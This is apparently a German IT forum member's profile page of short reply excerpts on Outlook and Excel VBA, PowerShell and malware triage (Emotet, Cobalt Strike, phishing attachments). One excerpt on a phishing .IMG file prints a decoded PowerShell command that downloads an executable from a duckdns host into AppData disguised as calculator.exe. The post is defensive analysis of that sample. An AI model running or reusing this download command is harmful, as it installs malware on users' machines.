HTML Javascript Schadcode?gelöst

Erstellt am 23.03.2023

Der dritte link wird von Kaspersky als "malicous" eingestuft. https://urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden. ...

HTML Javascript Schadcode?gelöst

Erstellt am 22.03.2023

Hier nach dem "Beautifier": ...

Outlook Signatur nach Empfänger ändern

Erstellt am 07.03.2023

Hallo, einfach gesagt, Outlook nutzt Word als Editor. Für die Signatur gibt es ein Bookmark: mfg ...

Automatisierung Dateiverwaltung MS-Outlook

Erstellt am 06.03.2023

Hallo, es geht mit wenigen Zeilen VBA, es sollte aber Erfahrungen vorhanden sein. Pseudocode: mfg ...

ICMP-Datenströme in der Netzwerkaufzeichnung

Erstellt am 19.12.2022

Hallo, im gezeigten Logfile oben in der letzten Zeile Die IP-Adresse in Hex (0xD21") könnte auflösen in Ping wird ausgeführt für pcve.dringendkommen.com 210.16.101.132 mit ...

ICMP-Datenströme in der Netzwerkaufzeichnung

Erstellt am 19.12.2022

Hallo, im ICMP-Protokoll gibt es ein buffer-overflow-error. Erkennbar wird ein Angriff aber nur auf einem detailierteren Level: Sans "Packet Tueday" mfg ...

Outlook - Gesendete Mails als Kopie speichern wiederherstellengelöst

Erstellt am 14.09.2022

Hallo, gibt es in der INBOX am unteren Ende des Header eine kleine Information, dass diese EMail beantwortet/weitergeleitet wurde? I.d.R. steht das Datum dabei ...

Empfangsadresse (Alias) in Outlook einblendengelöst

Erstellt am 03.06.2022

Hallo, hilft das? Die betreffende Mail muss ausgewählt sein. mfg ...

Outlook VBA - Jede 10. Mail verschieben

Erstellt am 03.06.2022

Ersetze durch wobei "Dein Ziel-Pfad" im Format "\\email-adress\folder-Name" ist ...

Outlook VBA - Jede 10. Mail verschieben

Erstellt am 03.06.2022

Hallo, ein Vorschlag (nicht getestet) ...

Cobalt Strike

Erstellt am 01.04.2022

Meine Idee war aus der genannten Github Datenbank die IP-Addressen der C2-Server auszulesen. Sofern die eigene Firewall die IP-Adressen der ausgehenden Verbindungen zumindesten für ...

Cobalt Strike

Erstellt am 31.03.2022

Konkret kann ich die Frage nicht beantworten, aber es gab die letzten Monate immer wieder mal Hinweise. Zum Üben werden hier Beispiele zur Verfügung ...

Random phishing mail erhalten jedoch unterhalb teil von echter mail enthalten

Erstellt am 17.02.2022

Hallo, was steht denn in den EMail-Headern? mfg ...

Liste von URLs in wininet.dll

Erstellt am 21.01.2022

Die Url's stammen bei meinem 32-bit-System aus dem genannten Ordner. Bei 64-bit sollte der Ort sein: C:\Windows\SysWOW64\wininet.dll (ungeprüft) Die Liste von oben stammt aus ...

CSV-Dateien mit unterschiedlichen Headern über ID zusammenfassen

Erstellt am 28.12.2021

Hallo, ein möglicher Weg ist, die CSV in jeweils ein Sheet in Excel zu importieren und dann mit "=SVersweis()" zu verknüpfen. mfg ...

Outlook Dateinamen von Anhängen bei Antwort anzeigen

Erstellt am 02.12.2021

Für ein von Hand selektiertes Mailitem sollte gehen: <code>Sub iGetConversation_Attachment() Dim EML As MailItem, Conv As Conversation Set EML = ActiveExplorer.Selection(1) Set Conv = ...

Outlook Dateinamen von Anhängen bei Antwort anzeigen

Erstellt am 02.12.2021

Ein Diskussionsbeitrag: Über die "ConversationsID" können die vorangegangen Email bestimmt werden und damit auch die Namen der Attachments gelesen werden. Etwas VBA-Kenntnisse sind nötig. ...

Mitarbeiter Sensibilisierung durch Fake Dateigelöst

Erstellt am 15.11.2021

Zwei Ideen: - Canary Token: Die bieten eine Warnnung, falls eine bestimmte Datei geöffnet wird - Word/Excel ohne VBA: Ein Bild einbinden, dass vom ...

Facebook, Instagram und Whats App downgeschlossen

Erstellt am 04.10.2021

Noch ein Hinweis auf das BGP: ISC.sans.edu Als Text: https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/ ...

Suche eine gute und einfache Anleitung wie man mit Powershell auf eine API Restschnittstelle zugreift

Erstellt am 16.08.2021

Hallo, hier ein Beispiel um die aktuelle Zeitabzufragen: <code>$url = ' $ret = invoke-restmethod -Uri $url # irm $ret.datetime</code> Ohne 'datetime' sieht man alle ...

Phishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)

Erstellt am 23.07.2021

Es ist Base64: $DecodedText = System.Text.Encoding::Unicode.GetString(System.Convert::FromBase64String($b64)) $DecodedText und ergibt nach Entfernen einiger Tabs: invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe” Fehlt da noch etwas? ...

Excel Wert aus Zelle "einfrieren"gelöst

Erstellt am 10.06.2021

Hallo, den angezeigten Wert erhält man mit cells(1,1).Text mfg ...

Excel Performance in großen Tabellen optimieren?

Erstellt am 26.05.2021

100.000 Zeilen sollten Excel nicht sonderlich belasten, 10.000 Formeln können das sehr wohl. Algemeine Ideen zur Beschleunigung: - keine ganze Spalten in Formels - ...

Subexpressions in der Powershell

Erstellt am 25.03.2021

Danke ...

Exchange-Hack (2021-03) war Angriff erfolgreich? Was dann?

Erstellt am 09.03.2021

Die Schwachstelle im "ExChange" gab es wohl schon lange (10 Jahre +) und wurde Microsoft am 2. Januar 2021 gemeldet. In den 2 Monaten ...

Einer Malware auf der Spur. Benötige Sherlock Holmes!gelöst

Erstellt am 01.03.2021

Versuch die DoItYourself-Methode: Prüfe - Autostart - den Ordner %Temp% - den Ordner C:\programdate - die Ordner in c:\users\public - windows kann alle DNS-Queries ...

Word, Excel, PDF Dateien Personalisieren: öffnen, bearbeiten nur auf Firmen PCsgelöst

Erstellt am 25.02.2021

Hallo, es ist zwar möglich solche Sperren per VBA einzubauen, aber da mit einem Tastendruck VBA beim Öffnen abgeschaltet werden kann, ist es "völlig ...

EXCEL Werte des Tabellenfilter als Liste ausgeben lassen

Erstellt am 11.02.2021

Vielleicht geht es, aber ein einfacher Weg ein 'unique' Liste zu erhalten ist der Spezial-Filter. Danach zu sortieren ist kein Problem. ...

Emotet angeblich unschädlich gemacht

Erstellt am 27.01.2021

Noch ein paar Details: ...

Emotet durch BKA zerschlagen

Erstellt am 27.01.2021

Viele MS-Malware Familien nutzen "WScript.Shell", das aber von vielen Anti-Viren-Programmen geblockt wird. Emotet startet PowerShell aber anderst, das ging vor wenigen Wochen noch durch. ...

Emotet angeblich unschädlich gemacht

Erstellt am 27.01.2021

Einen eher ausführlichen Artikel gibt es hier: ...

Emotet angeblich unschädlich gemacht

Erstellt am 27.01.2021

Es gibt seit Jahren eine Gruppe, die täglich alle Daten zu Emotet sammelt und veröffentlicht: Auf Twitter gibt es keine Meldung: ...

BATCH: Dateibesitzer mit kopieren

Erstellt am 26.01.2021

Hallo, vor kurzem habe ich einen Code gefunden (und nicht getestet), der den Besitzer einer Datei ausgeben soll. Es ist ein VBA-Code. Kannst Du ...

Tja, so kanns kommen

Erstellt am 20.01.2021

Haben sie Interesse an IT-Security? Da gibt es jeden Tag etwas neues. ...

TXT Datei verschieben wenn Datum drinnen stehtgelöst

Erstellt am 15.01.2021

Der Code sucht das aktuelle Datum in der ersten Zeile: Die folgenden Aktionen müssen noch ergänzt werden, bzw aus den anderen Beiträgen übernommen werden. ...

WAN IPs der ISPs auf Wohnorte getrackt?gelöst

Erstellt am 10.01.2021

Wenn Du nach "GeoIP" googlest, solltest Du viele Treffer erhalten: Sowohl bei Facebook in den Einstellungen als auch bei "www.weather.com" (F12: Netzwerk) siehst Du, ...

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Falls Emotet gestartet wurde, wird -vermutlich- eine dll ins $HOME-Directory geschrieben, also c:\users\-eigenerName- Zur Vorsicht sollte auch %temp% und c:\programData geprüft werden. Palawer: Einem ...

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Ok. Emotet greift die EMail - Kontakte ab und verschickt malware an diese Adressen. Es könnte Sinn machen die Geschäftspartner zu warnen. ...

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Wenn man den ersten Base64 string dekodiert, gibt es: ?WVs und Sachstandsanfragen machen alle RAe und RAin künftig selbst Macht das Sinn? ...

Emailspam mit Zip-Dateien

Erstellt am 08.01.2021

Ja, eindeutig malware: ein Trojaner Da ich kein Konto bei Virustotal habe, kann ich keine weiteren Infos, z.B. die Familie erkennen. Versuche so gut ...